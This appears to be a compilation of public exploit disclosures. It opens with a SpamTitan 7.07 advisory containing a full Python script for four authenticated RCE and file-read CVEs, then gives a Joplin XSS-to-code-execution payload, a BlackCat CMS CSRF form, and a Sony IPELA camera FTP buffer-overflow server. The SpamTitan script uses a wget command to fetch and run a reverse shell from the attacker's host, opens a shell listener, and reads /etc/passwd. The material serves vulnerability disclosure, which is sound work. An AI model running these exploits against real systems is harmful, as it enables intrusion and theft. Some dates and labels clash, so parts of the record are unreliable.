# CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804
---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code
Execution]------------------------------
SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple
Authenticated Remote Code Execution
Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions)
Vulnerability: Multiple Authenticated Remote Code Execution
CVSSv3: 8.7
(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)
Severity: High
Release Date: 2020-09-18
CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803,
CVE-2020-11804
I. Background
~~~~~~~~~~~~~
From www.spamtitan.com:
"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
administrators with extensive tools to control mail flow and protect against
unwanted email and malware."
II. Description
~~~~~~~~~~~~~~~
Multiple authenticated remote code execution (RCE) vulnerabilities were found
on the SpamTitan Gateway 7.07 and probably in pervious versions:
* CVE-2020-11699: Improper validation of the parameter fname on the page
certs-x.php would allow an attacker to execute remote code on the
target server. The user has to be authenticated before interacting with
this page.
* CVE-2020-11700: Improper sanitization of the parameter fname, used on the page
certs-x.php, would allow an attacker to retrieve the contents of
arbitrary files. The user has to be
authenticated before interacting with this page.
* CVE-2020-11803: Improper sanitization of the parameter jaction when
interacting with
the page mailqueue.php could lead to PHP code evaluation server-side,
because the user-provided input is passed directly to the php eval()
function. The user has to be authenticated on the web platform before
interacting with the page.
* CVE-2020-11804: Due to improper sanitization of the parameter qid,
used in the page
mailqueue.php, code injection can occur. The input for this
parameter is provided directly by an authenticated user via an HTTP GET
request.
III. PoC
~~~~~~~~
Use python 3 and install the following modules before executing: requests.
If your IP is 192.168.1.5 and the target SpamTitan server is
spamtitan.example.com, call the PoC like this:
./multirce.py -t spamtitan.example.com -i 192.168.1.5 -m <EXPLOIT
NUMBER> -u <USER> -p <PASSWORD> -U http://192.168.1.5/rev.py
---------------------------------------------
#!/usr/bin/env python
# Author: Felipe Molina (@felmoltor)
# Date: 09/04/2020
# Python Version: 3.7
# Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read
# 0days on SpamTitan 7.07 and previous versions.
# Product URL: https://www.spamtitan.com/
# Product Version: 7.07 and probably previous
import requests
from requests import Timeout
requests.packages.urllib3.disable_warnings()
import os
import threading
from optparse import OptionParser
import socket
import json
import re
from urllib.parse import urlparse
from time import sleep
from base64 import b64decode,b64encode
def myip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def shellServer(ip,port,quiet):
servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servers.bind((ip, port))
servers.listen(1)
info("Waiting for incoming connection on %s:%s" % (ip,port))
conn, addr = servers.accept()
conn.settimeout(1)
success("Hurray, we got a connection from %s" % addr[0])
prompt =conn.recv(128)
prompt=str(prompt.decode("utf-8")).strip()
command = input(prompt)
while True:
try:
c = "%s\n" % (command)
if (len(c)>0):
conn.sendall(c.encode("utf-8"))
# Quit the console
if command == 'exit':
info("\nClosing connection")
conn.close()
break
else:
completeanswer=""
while True:
answer=None
try:
answer=str((conn.recv(1024)).decode("utf-8"))
completeanswer+=answer
except socket.timeout:
completeanswer.strip()
break
print(completeanswer,end='')
command = input("")
except (KeyboardInterrupt, EOFError):
info("\nClosing connection")
break
# This is an authenticated remote code execution in "certs-x.php". E.g:
def CVE_2020_11699(cookies, target, shellurl):
# Giving time to the maim thread to open the reverse shell listener
sleep(5)
oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
/tmp/r.py" % (shellurl)
t1 = "%s/certs.php" % target
t2 = "%s/certs-x.php" % target
# get the csrf token value
res1 = requests.get(t1,cookies=cookies,verify=False)
m = re.search("var csrf_token_postdata
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
if (m is not None):
csrfguard=m.group(1)
csrftoken=m.group(2)
data = {
"CSRFName":csrfguard,
"CSRFToken":csrftoken,
"jaction":"deletecert",
"fname":"dummy || $(%s)" % oscmd
}
info("Triggering the reverse shell in the target.")
try:
res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
print(res2.text)
except Timeout:
info("Request timed-out. You should have received already
your reverse shell.")
else:
fail("CSRF tokens were not found. POST will fail.")
# This is an arbitrary file read on "certs-x.php"
def CVE_2020_11700(cookies,target,file):
fullpath="../../../..%s" % file
t1 = "%s/certs.php" % target
t2 = "%s/certs-x.php" % target
# get the csrf token value
res1 = requests.get(t1,cookies=cookies,verify=False)
m = re.search("var csrf_token_postdata
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
if (m is not None):
csrfguard=m.group(1)
csrftoken=m.group(2)
data = {
"CSRFName":csrfguard,
"CSRFToken":csrftoken,
"jaction":"downloadkey",
"fname":fullpath,
"commonname":"",
"organization":"",
"organizationunit":"",
"city":"",
"state":"",
"country":"",
"csrout":"",
"pkout":"",
"importcert":"",
"importkey":"",
"importchain":""
}
res2 = requests.post(t2,data=data,cookies=cookies,verify=False)
if (res2.status_code == 200):
success("Contents of the file %s" % file)
print(res2.text)
else:
fail("Error obtaining the CSRF guard tokens from the page.")
return False
# This is an authenticated RCE abusing PHP eval function in mailqueue.php
def CVE_2020_11803(cookies, target, shellurl):
# Giving time to the maim thread to open the reverse shell listener
sleep(5)
oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
/tmp/r.py" % (shellurl)
b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8")
payload="gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\""
% (b64)
t1 = "%s/certs.php" % target
t2 = "%s/mailqueue.php" % target
# get the csrf token value
res1 = requests.get(t1,cookies=cookies,verify=False)
m = re.search("var csrf_token_postdata
=.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text)
if (m is not None):
csrfguard=m.group(1)
csrftoken=m.group(2)
data = {
"CSRFName":csrfguard,
"CSRFToken":csrftoken,
"jaction":payload,
"activepage":"incoming",
"incoming_count":"0",
"active_count":"0",
"deferred_count":"0",
"hold_count":"0",
"corrupt_count":"0",
"incoming_page":"1",
"active_page":"1",
"deferred_page":"1",
"hold_page":"1",
"corrupt_page":"1",
"incomingrfilter":None,
"incomingfilter":None,
"incoming_option":"hold",
"activerfilter":None,
"activefilter":None,
"active_option":"hold",
"deferredrfilter":None,
"deferredfilter":None,
"deferred_option":"hold",
"holdrfilter":None,
"holdfilter":None,
"hold_option":"release",
"corruptrfilter":None,
"corruptfilter":None,
"corrupt_option":"delete"
}
# We have to pass a string instead of a dict if we don't want
the requests library to convert it to
# an urlencoded data and break our payload
datastr=""
cont=0
for k,v in data.items():
datastr+="%s=%s" % (k,v)
cont+=1
if (cont<len(data)):
datastr+="&"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0)
Gecko/20100101 Firefox/68.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
res2 =
requests.post(t2,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies)
except Timeout:
info("Request timed-out. You should have received already
your reverse shell.")
else:
fail("CSRF tokens were not found. POST will fail.")
# This is an authenticated RCE abusing qid GET parameter in mailqueue.php
def CVE_2020_11804(cookies, target, shellurl):
# Giving time to the maim thread to open the reverse shell listener
sleep(5)
oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python
/tmp/r.py" % (shellurl)
payload="1;`%s`" % oscmd
t = "%s/mailqueue.php?qid=%s" % (target,payload)
info("Triggering the reverse shell in the target.")
try:
res2 = requests.get(t,cookies=cookies,verify=False)
except Timeout:
info("Request timed-out. You should have received already your
reverse shell.")
# Authenticate to the web platform and get the cookies
def authenticate(target,user,password):
loginurl="%s/login.php" % target
data={
"jaction":"none",
"language":"en_US",
"address":"%s" % user,
"passwd":"%s" % password
}
res = requests.post(loginurl, data=data,allow_redirects =
False,verify=False)
if (res.status_code == 302 and len(res.cookies.items())>0):
return res.cookies
else:
return None
def printmsg(msg,quiet=False,msgtype="i"):
if (not quiet):
if (success):
print("[%s] %s" % (msgtype,msg))
else:
print("[-] %s" % msg)
def info(msg,quiet=False):
printmsg(msg,quiet,msgtype="i")
def success(msg,quiet=False):
printmsg(msg,quiet,msgtype="+")
def fail(msg,quiet=False):
printmsg(msg,quiet,msgtype="-")
def parseoptions():
parser = OptionParser()
parser.add_option("-t", "--target", dest="target",
help="Target SpamTitan URL to attack. E.g.:
https://spamtitan.com/", default=None)
parser.add_option("-m", "--method", dest="method",
help="Exploit number: (1) CVE-2020-11699 [RCE],
(2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700
[File Read]", default=1)
parser.add_option("-u", "--user", dest="user",
help="Username to authenticate with. Default:
admin", default="admin")
parser.add_option("-p", "--password", dest="password",
help="Password to authenticate with. Default:
hiadmin", default="hiadmin")
parser.add_option("-I", "--ip", dest="ip",
help="Local IP where to listen for the reverse
shell. Default: %s" % myip(), default=myip())
parser.add_option("-P", "--port", dest="port",
help="Local Port where to listen for the reverse
shell. Default: 4242", default=4242)
parser.add_option("-U", "--URL", dest="shellurl",
help="HTTP URL path where the reverse shell is
located. Default: http://%s/rev.py" % myip(),
default="http://%s/rev.py" % myip())
parser.add_option("-f", "--filetoread", dest="filtetoread",
help="Full path of the file to read from the
remote server when executing CVE-2020-11700. Default: /etc/passwd",
default="/etc/passwd")
parser.add_option("-q", "--quiet",
action="store_true", dest="quiet", default=False,
help="Shut up script! Just give me the shell.")
return parser.parse_args()
def main():
(options,arguments) = parseoptions()
quiet = options.quiet
target = options.target
ip = options.ip
port = options.port
user = options.user
password = options.password
shellurl = options.shellurl
method = int(options.method)
rfile = options.filtetoread
# Sanitize options
if (target is None):
fail("Error. Specify a target (-t).")
exit(1)
else:
if (not target.startswith("http://") and not
target.startswith("https://")):
target = "http://%s" % target
if (method < 1 or method > 4):
fail("Error. Specify a method from 1 to 4:\n (1)
CVE-2020-11699 [RCE]\n (2) CVE-2020-XXXX [RCE]\n (3) CVE-2020-XXXX2
[RCE]\n (4) CVE-2020-11700 [File Read]")
exit(1)
# Before doing anything, login
cookies = authenticate(target,user,password)
if (cookies is not None):
success("User logged in successfully.")
if (method == 1):
info("Exploiting CVE-2020-11699 to get a reverse shell on
%s:%s" % (ip,port),quiet)
rev_thread = threading.Thread(target=CVE_2020_11699,
args=(cookies,target,shellurl))
rev_thread.start()
# Open the reverse shell listener in this main thread
info("Spawning a reverse shell listener. Wait for it...")
shellServer(options.ip,int(options.port),options.quiet)
elif (method == 2):
info("Exploiting CVE-2020-11803 to get a reverse shell on
%s:%s" % (ip,port),quiet)
rev_thread = threading.Thread(target=CVE_2020_11803,
args=(cookies,target,shellurl))
rev_thread.start()
# Open the reverse shell listener in this main thread
info("Spawning a reverse shell listener. Wait for it...")
shellServer(options.ip,int(options.port),options.quiet)
elif (method == 3):
info("Exploiting CVE-2020-11804 to get a reverse shell on
%s:%s" % (ip,port),quiet)
rev_thread = threading.Thread(target=CVE_2020_11804,
args=(cookies,target,shellurl))
rev_thread.start()
# Open the reverse shell listener in this main thread
info("Spawning a reverse shell listener. Wait for it...")
shellServer(options.ip,int(options.port),options.quiet)
elif (method == 4):
info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet)
CVE_2020_11700(cookies,target,rfile)
else:
fail("Error authenticating. Are you providing valid credentials?")
exit(2)
exit(0)
main()
---------------------------------------------
III. Impact
~~~~~~~~~~~
Loss of confidentiality, integrity and availability of several files in the
target server, as well as loss of availability of several services running
in the SpamTitan.
Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db
would be highly impacted.
IV. Disclosure
~~~~~~~~~~~~~~
Reported By: Felipe Molina de la Torre
Vendor Informed: 2020-04-17
Patch Release Date: 2019-05-26
Advisory Release Date: 2019-09-18
V. References
~~~~~~~~~~~~~
* https://sensepost.com/blog/2020/clash-of-the-spamtitan/
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11699
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11700
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11803
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11804
---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple
Authenticated Remote Code Execution]---
# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Date: 2020-09-21
# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe
# Version: 1.0.190 to 1.0.245
# Tested on: Windows / Linux
# CVE : CVE-2020-15930
# References:
# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff
# 1. Technical Details
# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE.
# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application.
# 2. PoC
# Paste the following payload into a note:
<embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>">
# 2.1 RCE with user interaction
# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
# By default, notes are stored in the last notebook created.
<!-- exploit.html -->
<script>
x = new XMLHttpRequest;
j = {
title: "CVE-2020-15930",
body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>"
};
x.open("POST", "http://127.0.0.1:41184/notes");
x.send(JSON.stringify(j));
</script>
# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint.
<!-- notebooks.html -->
<script>
x = new XMLHttpRequest();
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
alert(x.responseText);
}
}
x.open('GET', 'http://127.0.0.1:41184/folders');
x.send();
</script>
# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453
BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that
allows remote arbitrary code execution .
PoC (Remove the csrf_token value) :
<input type=“hidden” name=“__csrf_magic” value=“”/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“
http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php
”method=“POST”>
<input type=“hidden” name=“__csrf_magic” value=“”/>
<input type=“hidden” name=“username_fieldname”
value=“username_274807982ed4”/>
<input type=“hidden” name=“password_fieldname”
value=“password_75868428f837”/>
<input type=“hidden” name=“_cat_ajax” value=“1”/>
<input type=“hidden” name=“username_274807982ed4” value=“accountname”/>
<input type=“hidden” name=“password_75868428f837” value=“yourpassword”/>
<input type=“submit” value=“Submit request”/>
</form>
</body>
</html>
# Exploit Title: Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow
# Google Dork: Server: Mida eFramework
# Date: 2020-09-30
# Exploit Author: LiquidWorm
# Vendor Homepage: https://pro.sony
# Version: <= 1.82.01
#!/usr/bin/env python
#
#
# Sony IPELA Network Camera (ftpclient.cgi) Remote Stack Buffer Overflow
#
#
# Vendor: Sony Electronics Inc.
# Product web page: https://pro.sony
# Affected version: SNC-DH120T v1.82.01
#
#
# Summary: IPELA is Sony's vision of the ultimate workplace, designed to revolutionize
# the way business communicates over global IP networks. IPELA products can improve the
# efficiency of your organization by connecting people and places with high-quality audio
# and video. The SNC-DH120T is an indoor tamper proof, high definition (720p) minidome
# network security camera with Electronic Day/Night settings, DEPA analysis and is ONVIF
# compliant. It supports dual streaming of H.264, MPEG-4 and JPEG at full frame-rate.
#
# Desc: The vulnerability is caused due to a boundary error in the processing of received
# FTP traffic through the FTP client functionality (ftpclient.cgi), which can be exploited
# to cause a stack-based buffer overflow when a user issues a POST request to connect to a
# malicious FTP server. Successful exploitation could allow execution of arbitrary code on
# the affected device or cause denial of service scenario.
#
# Tested on: gen5th/1.x
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5596
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5596.php
# Fixed in 1.88.0.0: https://pro.sony/en_NL/support-resources/snc-dh120/software/mpengb00000928
#
#
# 28.10.2019
#
# PoC:
# Trigger:
# curl 'http://10.0.0.3:5080/command/ftpclient.cgi' \
# -H 'Connection: keep-alive' \
# -H 'Cache-Control: max-age=0' \
# -H 'Authorization: Basic YWRtaW46YWRtaW4=' \
# -H 'Upgrade-Insecure-Requests: 1' \
# -H 'Origin: http://10.0.0.3:5080' \
# -H 'Content-Type: application/x-www-form-urlencoded' \
# -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36' \
# -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
# -H 'Referer: http://81.83.17.200:5080/en/l4/ftp/common.html' \
# -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
# --data 'FtpClientFunc=on&FcServerName=10.0.0.5&FcUserName=EVIL&FcPassword=NONESO&FcPassive=off&reload=referer' \
# --compressed \
# --insecure
#
#
# Observed fixed version log:
# 2020-07-27 17:48:03 FTP client Unexpected error occurred during FTP client operation.
#
import socket
HOST = '127.0.0.1' # 10.0.0.5
PORT = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
print 'Connection from', addr
while True:
data = conn.recv(1024)
if not data:
break
evil = "A" * 100000
evil += "B" * 10000
evil += "C" * 1000
conn.sendall(evil+'\n')
s.close()